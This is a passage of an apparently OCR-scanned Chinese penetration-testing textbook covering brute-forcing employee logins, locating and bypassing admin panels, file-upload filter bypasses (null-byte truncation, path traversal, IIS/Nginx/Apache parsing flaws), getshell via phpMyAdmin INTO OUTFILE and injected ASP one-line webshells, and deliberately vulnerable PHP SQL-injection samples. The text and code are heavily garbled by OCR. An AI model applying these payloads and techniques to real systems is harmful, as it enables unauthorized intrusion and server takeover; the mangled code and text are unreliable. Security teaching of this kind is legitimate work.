割 两 个 选项 就 能 轻松 识别 互联 网 60% 以 上 的 验证 码 。 


33.2 ”爆破 在 大 型 Web 站 点 渗透 中 的 作用 


在 对 大 型 Web 站 点 的 渗透 中 ， 一 般 不 会 直接 将 目标 放 到 主 站 上 ， 而 是 从 子 站 入 手 。 大 
家 都 知道 ， 一 个 大 型 站 点 一 定 有 些 内 部 人 员 登 录 的 系统 。 而 对 于 这 类 系统 ， 安 全 往往 掌握 
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在 用 户 手 里 ， 因 为 很 多 安全 公司 认为 某 个 系统 只 有 固定 的 一 些 内 部 账号 能 登录 ， 而 其 里 面 
的 一 些 操作 引发 的 安全 问题 便 不 是 那么 重要 了 ， 因 此 开发 中 常常 会 有 很 多 朴 忽 。 这 种 情况 
下 ， 内 部 人 员 密 码 的 强 弱 就 显得 格外 重要 ， 但 是 弱 口 令 仍 是 常 发 生 的 问题 。 

就 拿 内 部 邮件 系统 来 说 ， 不 妨 假设 渗透 目标 是 某 著名 网 络 安全 公司 A， 其 域名 是 www 
aaa.com， 通 过 二 级 域名 的 爆破 ， 发 现 了 其 内 部 邮件 系统 mailaaa.com。 大 家 都 知悉 ， 一 般 
企业 邮箱 的 格式 都 为 : 用 户 名 @ 公 司 的 域名 ， 所 以 这 里 登录 的 账号 格式 应 该 是 : 用 户 名 @ 
aaa.com。 接 下 来 ， 可 以 用 搜索 引擎 对 @aaa.com 进 行 搜索 ， 很 快 便 可 以 发 现 用 户 名 的 命名 
规则 ， 而 一 般 都 是 以 员工 姓名 拼写 作为 用 户 名 。 

接 下 来 ， 尝 试用 聆 虫 将 搜索 引擎 能 搜索 到 的 员工 名 字 都 怜 下 来 ， 搭 建 过 交互 站 点 的 人 
都 知道 ， 如 果 不 对 密码 的 复杂 度 作 要 求 ， 总 会 有 些 人 使 用 123456、88888888 这 样 的 弱 口 令 
作为 密码 ， 而 爆破 就 是 利用 这 一 特性 。 所 以 尽 可 能 多 地 搜集 其 员工 的 名 字 。 

当 员 工 名 字 搜 集 完毕 以 后 ， 便 可 以 将 其 做 成 用 户 名 的 字典 文件 ， 然 后 选取 一 些 最 常见 
的 弱 口 令 ， 将 密码 设 为 不 变量 ， 用 户 名 设 为 变量 ， 从 而 进行 用 户 名 的 爆破 。 

当成 功 地 爆破 出 某 个 账户 的 账号 、 密 码 后 ， 尝 试 利用 人 的 惰性 和 密码 的 通用 性 通 杀 其 
他 系统 ， 可 以 大 大 提高 渗透 效率 。 


3.4 后台 问题 


在 Web 滩 透 中 ， 后 台 文件 的 利用 常常 会 有 意 想 不 到 的 效果 。 而 一 个 网 站 后 台 路 径 的 暴 
露 就 等 同 于 将 家 的 具体 位 置 给 暴露 了 ， 为 了 杜绝 这 种 现象 发 生 ， 开 发 人 员 经 常 采用 复制 的 
后 台 路 径 ， 给 渗透 带 来 了 难度 。 那 常见 的 后 台地 址 查找 方法 又 有 哪些 呢 ? 


341 后 台地 址 查找 


1. Чїй, ER 


常见 的 后 台 扫描 器 是 用 外 载 字典 对 路 径 进行 爆破 ， 而 这 种 方法 的 局 限 性 也 很 明显 ， 字 典 的 
强度 决定 了 成 功率 。 而 相 比 较 而 言 ， 息 虫 常常 能 候 出 那些 很 隐秘 的 目录 ， 增 加 爆破 的 成 功率 。 


2. 搜索 引擎 


对 于 后 台 查 找 ， 常 用 的 语法 无 非 intext、inurl、intitle 等 最 基本 的 搜索 语法 ， 简 单 又 实 
用 ， 还 常常 有 意外 的 收获 。 


3. 页 面 信息 
在 火狐 浏览 器 中 访问 一 个 Web 站 点 ， 在 浏览 器 空白 界面 右 击 ， 单 击 “ 查 看 页 面 信 
息 ”， 效 果 如 图 3-31 所 示 。 
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图 3-31 查看 页 面 信息 
在 媒体 页 面 信息 中 可 以 看 到 多 媒体 文件 路 径 ， 包 括 图 片 等 的 路 径 。 因 为 这 些 图 片 往往 
是 管理 员 在 后 台 更 新 时 上 传 的 ， 而 有 些 Web 站 点 的 上 传 目 录 分 配 不 严格 ， 如 上 传 目录 是 后 
台 目录 的 子 目录 ， 所 以 导致 了 后 台 路 径 就 隐藏 在 图 片 路 径 中 。 


4. XSS 
XSS 的 危害 十 分 巨大 却 又 常常 被 忽略 ， 我 们 在 第 5 章 会 详细 讨论 更 多 的 前 端 技术 。 
5. 二 级 域名 及 其 他 端口 


在 对 大 型 网 站 进行 渗透 时 ， 常 常 发 现 一 个 现象 。 比 如 从 目标 站 点 的 一 个 二 级 域名 入 手 
进行 Web 渗 透 ， 但 其 后 台 登 录 接 口 往往 是 另 一 个 二 级 域名 或 三 级 域名 。 因 此 在 渗透 中 用 脚 
本 对 目标 站 点 的 二 级 域名 进行 爆破 还 是 很 有 必要 的 。 

其 他 端口 又 怎么 样 呢 ? 一 般 Web 站 点 默认 端口 是 80 端 口 ， 但 在 实际 渗透 中 ， 常 常会 发 
现 某 个 站 点 前 台 确 实 是 80 端 口 ， 而 后 台 登 录 端 口 往往 是 其 他 端口 ， 像 8000、8080、8001 都 
很 常见 。 所 以 ， 在 渗透 前 对 目标 的 信息 搜集 要 尽量 到 位 和 全 面 ， 以 免 渗透 中 为 此 浪费 大 量 
时 间 和 精力 。 

6. 访问 来 源 

此 方法 对 一 些 有 留言 板 或 是 能 和 管理 员 交 互 的 站 点 较为 有 效 。 首 先 ， 需 要 准备 一 个 自 
己 的 站 点 ， 然 后 在 此 站 点 中 添加 站 长 统计 的 JS， 将 准备 的 站 点 网 址 以 添加 友 链 的 名 义 发 给 
渗透 目标 的 管理 员 。 当 渗透 目标 的 管理 员 访 问 了 发 给 他 的 网 址 时 ， 这 时 在 站 长 统计 后 台 便 
能 看 到 访问 来 源 了 ， 而 一 般 管理 员 是 在 后 台 对 一 些 留言 进行 审核 ， 所 以 访问 来 源 常常 就 是 
后 台地 址 。 

在 开发 中 ， 后 台 是 为 了 方便 管理 员 对 网 站 进行 更 新 ， 因 此 功能 往往 很 多 ， 如 添加 管 
理 员 ， 数 据 库 备份 下 载 ， 文 件 上 传 等 。 功 能 强大 ， 伴 随 而 来 的 常常 是 安全 问题 。 在 渗 
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透 中 ， 对 后 台 的 巧妙 利用 更 胜 于 在 前 台大 费 周 章 地 挖掘 漏洞 。 那 常见 的 后 台 利 用 又 有 哪 
жи? 


34.2 后台 验证 绕 过 


渗透 中 ， 有 些 Web 站 点 的 后 台 使 用 了 JavaScript 验 
证 和 固定 cookie， 而 这 类 验证 被 绕 过 的 可 能 性 很 大 。 





就 拿 JavaScript 验 证 来 说 ， 因 为 它 发 生 在 客户 端 ， 因 此 非法 操作 ， 请 先 登录 后 再 进行 操作 1 
对 于 这 类 后 台 只 要 在 浏览 器 中 把 JavaScript 禁 止 掉 就 
能 正常 访问 后 台 了 。 例 如 ， 蓝 科 CMS 中 对 后 台 的 验证 IAN 
就 是 JavaScript， 如 图 3-32 所 示 ， 可 以 看 到 JS 开启 的 时 


候 ， 无 法 访问 后 台 。 13-32 ”JS 脚本 对 权限 进行 了 验证 
当 把 火狐 浏览 器 的 javascriptenabled 设 置 为 false 时 ， 再 次 对 后 台 进 行 访问 ， 如 图 3-33 所 
示 ， 可 以 看 到 成 功 访问 了 后 台 ， 轻 松 地 绕 过 了 JavaScript 的 验证 。 
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3-33 成功 进入 后 台 


34.3 ”后 台 越 权 


局 部 未 授权 访问 是 很 多 后 台 出 现 的 问题 ， 意 思 就 是 后 台中 的 某 个 页 面 可 以 被 访问 。 最 
常见 的 类 似 于 管理 员 管理 、 数 据 库 操作 、 文 件 上 传 之 类 ， 从 而 引发 任意 添加 管理 员 、 数 据 
泄露 、getshell 等 严重 问题 。 而 当面 对 后 台 里 那些 非 高 危 的 越权 时 ， 应 该 怎么 办 呢 ? 


1. 越权 XSS 
对 于 一 些 低 危 的 后 台 越 权 ， 开 发 者 们 常常 不 怎么 重视 ， 而 往往 问题 都 是 出 在 小 问题 
上 。 大 多 数 情况 下 ， 后 台 相 比 前 台 要 脆弱 太 多 ， 很 多 后 台 XSS、 后 台 注入 之 类 ， 在 开发 
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者 、 攻 击 者 眼中 很 “鸡肋 ”， 但 是 如 果 将 其 与 越权 结合 起 来 ， 其 实质 就 和 前 台 的 漏洞 差 
不 多 。 例 如 网 站 基本 信息 页 面 的 越权 ， 单 从 越权 角度 来 看 确实 没什么 影响 ， 无 非 是 一 些 
公司 名 之 类 的 。 但 是 如 果 攻 击 者 在 基本 信息 中 插入 XSS 代 码 ， 那 危害 性 甚至 超过 了 前 台 
的 XSS。 


2. 越权 注入 


后 人 台中 常常 也 有 很 多 数据 库 查 询 ， 如 新 闻 搜索 与 会 员 操作 等 。 其 实 ， 对 数据 库 的 任何 
操作 都 有 可 能 引发 注入 ， 而 往往 后 台 本 身 有 很 多 注入 ， 但 后 台 经 常 忽视 。 例 如 新 闻 管 理 页 
面 的 越权 ， 无 论 是 新 闻 的 删除 、 添 加 、 修 改 或 搜索 都 要 对 数据 库 进 行 操作 ， 如 果 开 发 者 因 
为 其 是 后 台 而 未 做 过 滤 或 过 滤 不 足 的 话 ， 那 危害 可 想 而 知 。 


344 ”后 台 文 件 的 利用 


对 于 后 台 文 件 的 利用 ， 常 见 的 有 文件 上 传 、 备 份 下 载 、 数 据 库 下 载 、robots.txt、 探 针 
等 ， 这 些 文件 带 来 的 影响 有 大 有 小 ， 上 至 getshell， 下 至 信息 泄漏 。 对 于 后 台 文 件 扫描 ， 只 
需要 留意 某 些 特定 的 后 缀 即 可 ， 如 rar、txt、mdb、sql 等 ， 这 样 能 大 大 节省 扫描 时 间 ， 提 高 
效率 。 
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文件 上 传 是 最 常见 的 getshell 方 法 之 一 。 而 文件 上 传 的 验证 大 致 可 以 分 为 两 类 : 客户 端 
验证 和 服务 端 验证 ， 在 这 里 讲解 常见 的 上 传 验证 的 绕 过 。 


3.5.1 常见 的 验证 方式 及 绕 过 


1. JavaScript 验 证 绕 过 


JavaScript 验 证 就 是 所 谓 的 客户 端 验 证 ， 也 是 最 脆弱 的 一 种 验证 。 直 接 修改 数据 包 或 
禁用 JavaScript 即 可 绕 过 。 


2. content-type 验 证 绕 过 


content-type 验 证 ， 最 常见 的 是 判断 content-type 是 否 为 image/gif。 对 于 这 种 验证 直接 修 
改 数据 包 中 的 content-type 为 image/gif 即 可 ， 如 图 3-34 所 示 。 


3. 黑 名 单 检测 绕 过 
黑 名 单 检测 是 常见 的 一 种 上 传 验证 方式 ， 不 允许 上 传 黑 名 单 中 存在 的 扩展 名 ， 其 安全 
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性 低 于 白 名 单 检测 ， 对 其 的 绕 过 方式 也 远 多 于 白 名 单 检测 。 对 于 黑 名 单 检 测 绕 过 的 常见 思 
路 有 以 下 几 种 。 

CD 找 黑 名 单 拓 展 名 中 的 漏网 之 鱼 ， 常 见 的 如 asa、cer。 

(2) 大 小 写 混淆 绕 过 ， 如 AsP、pHp。 

(3) 利用 解析 漏洞 绕 过 。 

(4) 特别 文件 名 构造 。 

(5) 截断 上 传 。 





Cookie: PHPSESSID=pf8tvcbes3uDq7km7cb7q9d3s6 
Connection: keep-alive 
: image/gif; 


2929179416656 





2929179416656 
Content-Disposition: form-data; name-"news title" 


图 3-34 ”修改 content-type 
4. 白 名 单 检测 绕 过 


白 名 单 检测 安全 性 远 高 于 黑 名 单 检测 ， 仅 允许 上 传 白 名 单 所 允许 的 几 种 扩展 名 ， 因 此 
黑 名 单 中 的 大 小 写 混淆 、 特 殊 的 扩展 名 等 绕 过 方式 对 白 名 单 检测 均 无 效 。 但 仍 可 以 用 截断 
上 传 、 解 析 漏 洞 、 特 别 文件 名 构造 对 其 进行 绕 过 。 


5. 对 危险 扩展 名 POST 检测 的 绕 过 


在 开发 中 ， 为 了 方便 维护 和 更 新 ， 会 先 对 扩展 名 进行 验证 ， 如 果 上 传 文件 的 扩展 名 为 
可 执行 脚本 ， 便 会 对 其 POST 的 数据 进行 检测 ， 如 果 存 在 恶意 代码 就 会 禁止 上 传 。 而 对 于 
这 类 上 传 检测 的 绕 过 大 致 有 这 几 种 思路 ， 一 是 利用 变种 木马 绕 过 其 检测 ， 二 就 是 用 包含 文 
件 对 其 进行 绕 过 。 就 拿 PHP 来 说 ， 先 将 一 句 话 木马 放 进 一 个 txt 文 件 中 ， 因 为 txt 并 非 可 执行 
脚本 ， 因 此 成 功 上 传 ， 然 后 再 将 如 图 3-35 所 示 的 代码 放 进 一 个 PHP 文 件 中 ， 加 载 外 部 xx.txt 
文件 。 
<?php 
include 'xx.txt'; 
2 
图 3-35 “加载 外 部 x x :txt 文件 
利用 PHP 中 的 include 函 数 将 刚才 上 传 的 txt 文 件 包含 进去 ， 而 因 PHP 中 include 是 常用 函 
数 ， 一 般 POST 检 测 不 会 认为 其 是 恶意 代码 ， 因 此 成 功 上 传 ， 从 而 绕 过 限制 执行 恶意 代码 。 


6. 服务 器 目录 限制 的 绕 过 


有 的 Web 应 用 程序 本 身 对 扩展 名 并 没有 什么 验证 ， 而 是 在 服务 器 上 对 上 传 目录 允许 上 
传 的 文件 扩展 名 进行 限制 。 而 对 于 这 类 防御 方法 ， 如 果 能 控制 上 传 路 径 即 能 成 功 绕 过 了 。 
其 中 最 常见 的 便 是 上 传 路 径 被 写 在 了 数据 包 中 ， 对 此 直接 修改 数据 包 即 可 ， 如 图 3-36 所 
示 ， 这 里 用 ../ 跳 出 被 限制 的 目录 。 


a= € 


EN Ul mESzeHddn 







——dfcb2dc0832 
ta; name-^uppath^ 


一 一 一 一 -一 -一 一 -一 一 一 一 ?dfcb2dc0832 


Content-Disposition: form-data; паље= Submit 


图 3-36 ”直接 修改 上 传 路 径 
还 有 些 不 常见 的 ， 直 接 在 文件 名 前 加 ../ 进 行 目录 的 跳出 ， 如 图 3-37 所 示 。 
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----------------------------- 2929179416656 
Content-Disposition: form-data; name="img_thumb"; 
filename-"../2.php" 








Content-Type: application/octet-stream 


图 3-37 构造 特殊 文件 名 跳出 当前 目录 
3.5.0 ”具体 剖析 一 些 绕 过 手法 


1. 截断 上 传 


常见 的 截断 就 是 利用 %00 或 %80-%99 对 文件 名 进行 截断 从 而 绕 过 验证 。 在 Burp 中 可 以 
修改 其 hex 值 进行 截断 ， 如 图 3-38 所 示 。 
ph 人 Lee 


filename-"lL.php;.3pg" 
Content-Type: application/octet-stream 


Hj3-38 ”构造 特殊 文件 名 
将 文件 名 中 的 hex 值 替换 为 00， 如 图 3-39 和 图 3-40 所 示 。 








D E b оа b за 22 by оа m-data; name= Im 
2 2 3 20 66 69 бс 65 бе 61 gthumb':flena 

3 68 то Bü |2е ва 70 67 22 04 me="1php;jpg" 

» 74 2 54 79 70 65 3a 20 61 Content-Type: a 

4 69 6 бе 2 6 63 74 65 74 Ppplication/octet 

3 (0d ба (d ба Od ба 24 2d 24 -stream— 

з 24 2d 24 2d 2d 2d 2d 2d 24 


图 3-39 分 号 的 位 置 
----------------------------- 2929179416656 
Content-Disposition: form-data; name-"img thumb"; filename="[|php0:3po"” 


Content-Type: application/octet-stream 


图 3-40 ”hex 值 成 功 被 修改 


2. 解析 漏洞 
某 些 Web 应 用 程序 对 上 传 后 的 文件 没有 进行 重 命 名 。 对 此 ， 可 以 尝试 用 一 些 解析 漏洞 
进行 绕 过 。 


CD IIS 6.0 解 析 漏洞 
利用 IIS 6.0 解 析 漏 洞 的 方法 有 两 种 : 目录 解析 和 文件 解析 。 对 于 目录 解析 ， 其 原理 
是 在 网 站 下 建立 名 字 为 x.asp、x.asa 的 文件 夹 ， 其 目录 内 任何 扩展 名 的 文件 都 被 IS 当 作 
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ASP 文 件 来 解析 并 执行 ， 如 /xx.asp/xx-jpg，xx-jpg 会 被 当 作 ASP 执 行 。 对 于 文件 解析 ， 如 
xx.asp; .jpg， 分 号 后 面 的 不 被 解析 ， 因 此 等 同 于 xx.asp。 

(2) Nginx 解 析 漏洞 

在 默认 Fast-CGI 开 启 状况 下 ， 上 传 一 个 含有 恶意 代码 的 图 片 ， 其 URL 如 : xxx.com/xx. 
jpg。 当 访问 xxx.com/xx.jpg/ php 时 ， 原 本 的 xx.jpg 便 会 被 当 作 php 执 行 了 。 

(3) Nginx <8.03 空 字 节 代码 执行 漏洞 

在 上 传 的 图 片 中 插入 恶意 代码 ， 然 后 通过 访问 Xxx.jpg%00.php 来 执行 其 中 的 代码 。 

(4) Apache 解 析 漏 洞 

Apache 是 从 右 到 左 开始 判断 解析 ， 如 果 为 不 可 识别 解析 ， 就 再 往 左 判断 ， 比 如 
xx.php.owfrar 中 .owf 和 rar 这 两 种 后 级 是 Apache 不 可 识别 解析 ，Apache 就 会 把 xx.php.owf. 
rar 解 析 成 php。 


3. 特别 文件 名 构造 


在 黑 盒 中 ， 对 于 一 些 不 合 规范 的 上 传 验证 ， 常 常会 出 现 一 些 菲 更 所 思 的 绕 过 。 例 如 : 
xx.php“.”jpg、xx.php 等 ， 对 于 这 类 验证 ， 在 黑 盒 环境 下 常常 需要 进行 大 量 尝试 。 





3.6 ”getshell 的 其 他 方式 


文件 上 传 是 getshell 的 主要 方式 之 一 ， 除 了 文件 上 传 ， 其 实 还 有 很 多 其 他 的 getshell 的 
方式 。 

1. phpMyAdmin 

利用 弱 口 令 登 录 phpMyAdmin， 访 问 http://URL/phpmyadmin/libraries/select_lang.lib. 
php， 可 以 得 到 目标 站 点 的 物理 路 径 ， 然 后 选择 一 个 数据 库 ， 运 行 以 下 MySQL 语 句 : 


Create TABLE a (cmd text NOT NULL); 
Insert INTO a (cmd) VALUES ("); 
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php'; 


Drop TABLE IF EXISTS a; 


这 些 语句 的 运行 效果 如 下 : 

运行 第 一 条 语句 在 选 定 的 数据 库 中 建 一 个 表 a; 运行 第 二 条 语句 将 PHP 一 句 话 木 
马 写 到 a 表 中 ; 接着 执行 第 三 条 语句 ， 把 a 表 输出 到 网 站 目录 下 的 d.php 里 ， 即 可 成 功 
getshell. 


2. 数据 库 备 份 
数据 库 备份 也 是 常见 的 getshel] 方 法 ， 不 过 mdb 数 据 库 备份 在 比较 新 式 的 后 台中 已 经 很 
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少见 了 ， 但 在 老式 后 台中 仍然 是 很 常见 的 。 一 般 情况 下 ， 需 要 满足 两 个 条 件 一 定 能 成 功 
getshell: 数据 库 路 径 可 控 和 备份 文件 名 可 控 ， 如 图 3-41 所 示 。 








备份 数据 库 
当前 数据 库 地 址 (相对 路 径 ) : data_jk/ joekoe_data. asp 
备份 数据 库 目录 (相对 路 径 ) : databackup 如 目录 不 存在 ,程序 棕 自 动 创建 
备份 数据 库 名 称 (文件 全 各) ; databak_2015-7-7. asp 如 该 文件 存在 棕 会 被 要 芋 ， 如 没有 格 


























图 3-41 对 备份 路 径 和 名 称 进行 修改 
这 里 只 需要 将 当前 数据 库 路 径 改 成 上 传 的 图 片 路 径 ， 再 将 备份 数据 库 名 修改 为 后 门 地 
址 即 可 。 
3. 写 入 配置 文件 


例如 xycms 的 后 台 配 置 文件 getshell， 在 配置 文件 中 任意 一 栏 中 插入 一 句 话 木马 " >< 
%execute (Request кыйс " 即 可 getshell， 如 图 3-42 所 示 。 





自助 洗车 机 "%>CSexecute (Request (chr (112) ))%›><% ” | 
upLoadFile/2013926589: 
图 3-42 ”插入 一 句 话 木马 
被 插入 代码 的 文件 inc/config.asp 的 源码 如 图 3-43 所 示 。 
Жл [rv 1\wwwroot\ 子 站 2\Inc\config азр 
% 
Be 

















Const wzname= “p 
Const descriptio 






"= тл uest (chr (112)) )^X' "" 网 站 关键 字 
foe Босо н 
ЕД 


RA 


系 手机 





Mme 1- 审 核 * 
БЫА ла, WW..." PRAXI 


图 3-43 配置 文件 源码 





4 文件 包含 


在 黑 盒 渗 透 中 ， 文 件 包含 也 是 常见 的 getshell 方 法 之 一 ， 接 下 来 在 审计 环节 将 详细 讲解 
其 原理 及 利用 方式 。 
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何 为 代码 审计 ? 通俗 地 讲 ， 通 过 阅读 一 份 源码 ， 对 其 进行 各 类 漏洞 挖掘 ， 这 样 的 过 程 
便 统称 为 审计 。 在 审计 中 ， 你 不 但 需要 知道 各 类 漏洞 的 原理 ， 还 需要 良好 的 审计 环境 。 在 
面 对 大 型 开源 程序 时 ， 信 息 量 往往 十 分 巨大 ， 所 以 工具 的 分 析 和 检索 是 必 不 可 少 的 。 本 章 
将 以 PHP 代 码 为 例 ， 来 讨论 代码 审计 的 相关 知识 。 

PHP 作 为 当今 热门 的 脚本 语言 ， 尤 其 适合 Web 开 发 。 因 为 其 拥有 跨 平 台 、 易 上 手 、 功 
能 强大 等 特点 ， 现 被 广泛 使 用 。 然 而 ， 随 着 越 来 越 多 地 被 网 站 使 用 ，PHP 引 发 的 安全 问题 
也 变 得 热门 起 来 。 





4.1 常用 的 审计 工具 


好 工具 才能 带 来 高 效率 ， 首 先 来 了 解 一 下 常用 的 审计 工具 。 


1. Notepad 
虽然 Notepad〈 记 事 本 ) 拥有 简洁 的 界面 ， 但 因为 其 效率 低下 ， 使 用 的 人 并 不 多 。 
2. Seay PHP 


Seay PHP 代 码 审计 工具 支持 单个 关键 词 扫描 、 批 量 函 数 扫描 、 批 量 正则 匹配 。 相 对 纯 
文本 而 言 ， 提 高 了 不 少 效率 ， 如 图 4-1 所 示 。 


пиже REEE FHES NE SHAS инно 
FBE 





хи [eamm] [RE | nga: Q w 
para 























[ #= | ий |n 390880 S6PDH3E, анинин TE XDANENR AN BURE KIANA 





图 4-1 Seay PHP 界 面 
3. CodeXploiter 


这 是 一 款 国外 的 代码 审计 工具 ， 其 特点 在 于 能 够 初步 判定 存在 问题 的 代码 位 置 和 存在 
的 问题 ， 再 结合 手工 查看 即 可 判定 问题 是 否 存 在 ， 十 分 便捷 。 


n, wig а. 
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4. 抓 包 改 包 工具 


这 些 工具 对 有 渗透 经 验 的 读者 来 说 应 该 不 会 陌生 ，Burmp Suite 和 Fiddler 比 较 知名 ， 如 
图 4-2 和 图 4-3 所 示 。 


Вир intruder Repeater Window Нер. 











Proxy Spider Scanner 





Fiter: Hiding not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders. 


Host | memos | urt | Params |iStatusiai] Leng | mme ty 
































[ Enable automaticresponses [C] Unmatched requests pal 
[ AddRue | [ import.. | E 
Rue dtr 
v | Tes. | Save 
Erruwrkauuas ` 
 CustomRules.js was loaded at: Fri Jul 17 02:29:32 UTC+8 2015 


4-3 Fiddler 








5. 字符 转换 工具 


字符 转换 工具 很 多 ， 笔 者 在 这 里 推荐 小 葵 多 功能 转换 工具 ， 支 持 将 普通 编码 转换 为 
URL/SQL En/Hex/Asc/MDS5 32/MD5_16/Base64 等 格式 的 编码 ， 非 常 实 用 ， 如 图 4-4 所 示 。 


6. 常用 的 火狐 插件 


对 于 火狐 浏览 器 ， 部 分 读者 可 能 还 不 清楚 它 的 价值 。 在 渗透 中 ， 火 狐 浏 览 器 以 及 它 的 
拓展 插件 是 必 不 可 少 的 工具 ， 它 在 PHP 审 计 中 也 是 个 很 得 力 的 助手 。 在 这 里 对 于 火狐 浏览 
器 的 安装 就 不 阐述 了 ， 下 面 来 给 大 家 介绍 几 款 常 用 的 插件 。 

火狐 插件 的 安装 很 简单 ， 单 击 菜单 中 的 “管理 您 的 附加 组 件 ”按钮 然后 在 搜索 框 里 
搜索 要 安装 的 插件 名 称 即 可 ， 如 图 4-5 所 示 。 
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图 4-4 小 葵 多 功能 转换 工具 图 4-5 ”安装 和 管理 火狐 插件 


(1) Firebug。Firebug 在 浏览 网 页 的 同时 又 可 作为 功能 丰富 的 开发 工具 ， 使 用 者 可 以 
对 任何 网 页 的 CSS. HTML 和 JavaScript 进行 实时 编辑 、 调 试 和 监控 ， 如 图 4-6 所 示 。 


* W < > ge HTML сы W DOM 8 Cookies Р #йх==в|^|ъ| ВОВ 
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图 4-6 ”Firebug 调 试 工具 
(2) Live HTTP headers。 该 工具 用 来 对 数据 包 进 行 捕 获 ， 如 图 4-7 所 示 。 











Headers | Generator Config | About 











HTTP Headers 
httpi/cclvfirefoxchina en/celvjv2/patterns;son 


GET J-cv/v2jpatterne jton HTTP/1.1 

Host: cdvjirefoxchinacn 

User-Agent: Mozila/5. (Windows NT 6.3: WOW64 rm38.0) Geckc/20100101 Firefox/38.0 

Accept: text/html application html xml application/emkqz 09 7/;9-08. 

Accept Language: zh-CN zhq=03,en-US;q=05,en:q=0.3 

Accept-Encoding: gzip, deflate 

Cookie: Hm_vtdd4736b5fb302cb052cf19107df5dzc4-143618650014370715131437071550 1437561122 
Connection: keep-alive 


HITP/13 200 OK 
Expires: Wed, 22 Jul 2015 16:12:45 GMT 
Date: Wed, 22 Jul 2015 15:42:45 GMT 











|o E B ore Е: [o] 











4-7 Live HTTP headers 
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(3) Hackbar。Hackbar 包 含 了 一 些 常 用 的 工具 ， 如 SQL、XSS、POST 请 求 、 加 密 
等 ， 如 图 4-8 所 示 。 


€ À https//www.baidu.com gave 





INT м) = Ф SQL- XSS- Encryption- Encoding- Other- 
аш Load URL 
Å Split URL 
2) Execute 
E Enable Post data [] Enable Referrer 


图 4-8 Hackbar 
善 用 这 些 插件 ， 可 以 极 大 地 提高 效率 ， 刚 开始 使 用 时 ， 各 位 读者 可 以 多 花 一 些 时 间 来 
熟悉 它们 ， 毕 竟 ， 磨 刀 不 误 砍 柴 工 。 


4.2 SQL 注入 


如 今 ， 随 着 PHP 被 广泛 使 用 ，PHP 的 安全 问题 越 来 越 被 关注 。 而 最 常见 的 搭配 就 是 
PHP+MySQL， 接 下 来 我 们 探讨 一 下 PHP 审 计 中 MySQL 注 入 的 挖掘 。 


4.2.1 注入 的 原理 


顾名思义 ，SQL 注 入 就 是 通过 把 SQL 命令 插入 到 Web 表 单 提 交 、 输 入 域名 或 页 面 请 求 
的 查询 字符 串 ， 最 终 达 到 欺骗 服务 器 执行 恶意 的 SQL 命令 的 目的 。SQL 注 入 是 当今 网 络 上 
最 普遍 的 一 种 攻击 方法 。 
为 了 更 好 地 了 解 其 原理 ， 下 面 来 看 一 段 问题 代码 。 
<?php 
include ('config.php'); 
if ($ cET['id']) í 


$id-$ GET['id']; //GETÀ XX 
$sql-"select * from test user where id-$id"; // 拼 接 语句 
$result=mysql query ($sql); // 代 入 查询 


echo mysql error(); 
} 


?> 


从 代码 中 可 以 看 到 ， 先 将 参数 id 的 值 以 GET 方 式 传递 给 变量 id， 然 后 直接 将 变量 id 代 
入 了 SQL 语句 进行 查询 。 而 当 提交 如 单 引号 这 样 的 特殊 字符 时 ， 便 会 出 现 语法 错误 ， 从 而 
产生 报错 。 


== Ab 
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select * from test user where id=$id—select * from test user where id=' 


因此 ， 一 个 最 简单 也 最 典型 的 SQL 注入 漏洞 出 现 了 。 提 交 单 引号 后 的 结果 如 图 4.9 所 示 。 
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You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near "" at line 1 








图 4-9 提交 单 引号 


4.2.2 常见 的 注入 


在 审计 中 ， 最 常 出 现 的 注入 便 是 GET 注 入 、POST 注 入 和 Cookie 注 入 。 而 POST 注入 
也 是 最 容易 被 忽略 的 ， 有 时 可 能 因为 传递 的 参数 较 多 ， 常 常 忽略 某 个 参数 的 过 滤 ， 从 而 
导致 了 注入 。 在 实际 开发 中 ， 往 往 有 的 开发 人 员 使 用 了 REQUEST 传 参 ， 却 只 对 GET 进 行 了 
过 滤 ， 因 此 可 以 换 一 种 方式 提交 数据 进行 注入 《在 黑 盒 中 更 加 普遍 ) 。 下 面 来 看 两 段 问题 


代码 。 
Global.php: 
«?php 
foreach ($ GET as $get key-»$get var)( // 遍 历 所 有 GET 过 来 的 值 


if (is numeric($get var)) { 
$get[strtolower($get key)]-get int($get var);// 加 载 函 数 get int 
) else ( 


die ("error"); 
) 
function get int ($number)( 
return intval ($number) ; // 强 制 整 型 


?> 


<?рһр 
include ('config.php'); 


=. Ен 
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include ('global.php'); // 加 载 过 滤 文 件 
$id-$ REQUEST['id']; 

$sgl-"select * from test user where id-$id"; // 拼 接 语句 
$result-mysql query ($591); // 代 入 查询 
echo mysql error(); 


?> 


因为 REQUEST 默 认 情 况 下 包含 了 $ СЕТ, $ POST 和 $_COOKIE 的 数组 ， 虽 然 对 GET 方 
式 进 行 了 过 滤 ， 但 仍 可 以 用 POST 或 者 Cookie 的 方式 来 提交 数据 ， 从 而 绕 过 了 过 滤 进 行 注入 。 

注意 : POST 传递 是 位 于 数据 包 中 的 。 因 此 ， 注 入 时 便 需 要 用 到 抓 包 改 包工 具 ， 这 里 
直接 用 火狐 插件 代替 ， 如 图 4-10 所 示 。 


€ @ localhos/testchp W 82; cC |[Q соолот > |= 





ют rJ = ° SQL- XSS- Encryption: Encodings Other- 


Q LogdURL http//ocalhoct/test php 








+ 


You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near "" at line 1 











图 4-10 POST 注入 
很 多 开发 人 员 在 开发 中 对 数组 的 过 滤 不 严 ， 往 往 只 是 过 滤 了 value， 而 忽略 了 key， 下 
面 来 看 一 段 代码 。 


<?php 

include ('config.php'); 

$id-$ GET['id']; 

if(is array($id))( 

foreach ($id as $key-»$value)( // 遍 历 

$value-intval($value); // 对 value 进 行 强制 整 型 
$sql="select * from test user where id-$key and username= 
$value"; 
$result=mysql query ($591); 


echo mysql_error (); 


2> 
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可 以 看 到 上 述 代码 对 id 的 value 进 行 了 过 滤 ， 却 忽略 了 对 key 的 过 滤 ， 并 且 将 key 代 入 了 
查询 ， 因 此 可 以 对 key 进 行 注入 ， 如 图 4-11 所 示 。 


каруосаһлр?@1ы2 #1 x 
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E] Enable Post dats [7 Enable Referer 


You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the 
right syntax to use near " and username=1' at line 1 








图 4-11 数组 key 的 注入 


注意 : 这 里 的 注入 格式 为 xx.test. php?id[ 注 入 语句 二 1 。 


4.2.3 http 头 注入 


